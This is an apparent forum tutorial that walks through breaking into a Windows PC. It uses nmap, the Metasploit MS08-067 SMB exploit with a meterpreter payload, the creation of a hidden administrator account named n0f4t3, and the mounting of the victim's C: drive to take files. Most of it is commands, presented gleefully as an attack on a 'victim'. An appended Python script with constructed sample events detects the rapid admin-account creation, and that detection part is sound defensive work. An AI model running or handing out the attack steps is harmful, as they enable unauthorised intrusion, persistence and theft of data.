
hack the target system

Main Part:
- We download nmap (nmap.org) so that we can scan the remote PC.
- On the terminal we write: nmap -sS -O
- If you see that ports 139 TCP and 445 TCP are open, then everything is exactly as we want it to be.
- Now we download Metasploit (metasploit.org) and open it via the terminal.
- Now that Metasploit is running, we start the attack.
- We write "show exploits" at the terminal and get a list of the available exploits.
- We choose the exploit "ms08_067_netapi" by writing "use windows/smb/ms08_067_netapi".
- Now we set RHOST to our victim's IP: "set RHOST
- And RPORT to 445: "set RPORT 445"
- Now we write "set SMBPIPE SRVSVC" and hit ENTER, and then "set TARGET 0" and hit ENTER again.
- OK! Let's set the payload: "set PAYLOAD windows/meterpreter/bind_tcp"
- IT'S TIME TO HACK THE COMPUTER!!!! Write "exploit" and hit ENTER.
- If everything is OK you should see the following message: "[*] Meterpreter session 1 opened (xxx.xxx.xxx.xxx:xxxx -> xxx.xxx.xxx.xxx:xxxx)"
- Meterpreter is running. We are inside the target PC!
- Let's open the target's CMD: "execute -f cmd.exe -c -H -i"
- If it says "X:\WINDOWS\System32" then the mission is accomplished.
- Now let's create our own admin account.
- Write: "net user n0f4t3 mypass /add". You should see a confirmation message saying "The command completed successfully."
- Now let's make the account an admin: "net localgroup administrators n0f4t3 /add".
- You should again see the confirmation message saying: "The command completed successfully."
- Then type "exit" to exit CMD.
- OMG!! We made it!!! But how can we steal his files????
- We boot into Windows...
- We go to "Start > Run", type "cmd" and hit ENTER.
- Then we write "net use X: \\\C mypass /user:n0f4t3" and hit ENTER.
- If that doesn't work, type "net use X: \\\C: mypass /user:n0f4t3" and hit ENTER.
- Now go to "My Computer" and you should see a new drive called X:. Open it and enjoy the victim's files.
That's all Folks!!!
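From the defender's side, the persistence step above (a new local account immediately added to Administrators) leaves a recognizable trace in the Windows Security log: event 4720 (user account created) followed within seconds by event 4732 (member added to a security-enabled local group) for the BUILTIN\Administrators group. The following is an added example, not code from the original post; the events are constructed, their field layout is simplified, and the detector flags any account that goes from creation to Administrators inside a short window.

```python
"""Flag local accounts that are created (Security event 4720) and added to
BUILTIN\\Administrators (event 4732) within a short window.
The EVENTS list below is constructed sample data with a simplified field
layout, not a real Windows log export."""
from datetime import datetime, timedelta

ADMINISTRATORS_SID = "S-1-5-32-544"  # well-known SID of BUILTIN\Administrators

# Constructed sample events. "subject" is the account that performed the action;
# a creation performed by the machine account (NAME$) means it ran as SYSTEM,
# which is what a service-level remote exploit would look like, not an admin
# working interactively.
EVENTS = [
    {"time": "2024-03-01T10:00:01", "id": 4624, "subject": "WORKSTATION$", "target": "WORKSTATION$", "group_sid": None},
    {"time": "2024-03-01T10:05:10", "id": 4720, "subject": "WORKSTATION$", "target": "n0f4t3", "group_sid": None},
    {"time": "2024-03-01T10:05:12", "id": 4732, "subject": "WORKSTATION$", "target": "n0f4t3", "group_sid": ADMINISTRATORS_SID},
    # A legitimate-looking change: created in the morning, promoted hours later.
    {"time": "2024-03-01T11:30:00", "id": 4720, "subject": "helpdesk", "target": "svc_backup", "group_sid": None},
    {"time": "2024-03-01T14:00:00", "id": 4732, "subject": "helpdesk", "target": "svc_backup", "group_sid": ADMINISTRATORS_SID},
]


def find_rapid_admin_creations(events, window=timedelta(minutes=10)):
    """Return (account, subject, seconds_between) for every account whose 4720
    is followed by a 4732 into Administrators within `window`.
    Events are sorted first so input order does not matter."""
    created = {}  # account name -> (creation time, subject who created it)
    hits = []
    for e in sorted(events, key=lambda ev: ev["time"]):
        t = datetime.fromisoformat(e["time"])
        if e["id"] == 4720:
            created[e["target"]] = (t, e["subject"])
        elif e["id"] == 4732 and e["group_sid"] == ADMINISTRATORS_SID:
            if e["target"] in created:
                t0, subject = created[e["target"]]
                delta = t - t0
                if timedelta(0) <= delta <= window:
                    hits.append((e["target"], subject, int(delta.total_seconds())))
    return hits


if __name__ == "__main__":
    for account, subject, seconds in find_rapid_admin_creations(EVENTS):
        print(f"ALERT: {account!r} created by {subject!r} and made admin after {seconds}s")
```

The svc_backup pair is deliberately outside the window, so only the n0f4t3 chain is reported; in production the window and the "subject is a machine account" signal are the two knobs to tune against your own change-management noise.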
